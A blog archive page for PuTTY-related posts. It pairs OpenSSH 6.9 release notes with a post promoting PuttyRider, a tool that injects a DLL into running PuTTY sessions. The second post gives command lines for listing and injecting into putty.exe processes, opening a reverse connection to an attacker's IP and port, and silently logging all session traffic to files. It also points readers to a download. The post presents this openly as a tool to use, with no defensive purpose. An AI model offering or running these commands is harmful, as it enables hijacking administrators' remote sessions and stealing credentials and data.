Category Archives: putty

OpenSSH 6.9 released; chacha20-poly1305 is the default cipher now

by

0

New Features
————

* ssh(1), sshd(8): promote chacha20-poly1305@openssh.com to be the
default cipher

* sshd(8): support admin-specified arguments to AuthorizedKeysCommand;
bz#2081

* sshd(8): add AuthorizedPrincipalsCommand that allows retrieving
authorized principals information from a subprocess rather than
a file.

* ssh(1), ssh-add(1): support PKCS#11 devices with external PIN
entry devices bz#2240

* sshd(8): allow GSSAPI host credential check to be relaxed for
multihomed hosts via GSSAPIStrictAcceptorCheck option; bz#928

* ssh-keygen(1): support “ssh-keygen -lF hostname” to search
known_hosts and print key hashes rather than full keys.

* ssh-agent(1): add -D flag to leave ssh-agent in foreground without
enabling debug mode; bz#2381

PuttyRider tool hijacks Putty sessions in order to sniff conversation and inject Linux commands.

by

0

Puttyrider targets sysadmin tool putty.  This tiny utility hijacks putty sessions and injects code in open sessions.

Usage;

List existing Putty processes and their status (injected / not injected)

PuttyRider.exe -l

Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don’t forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

PuttyRider.exe -x

Download, code, details here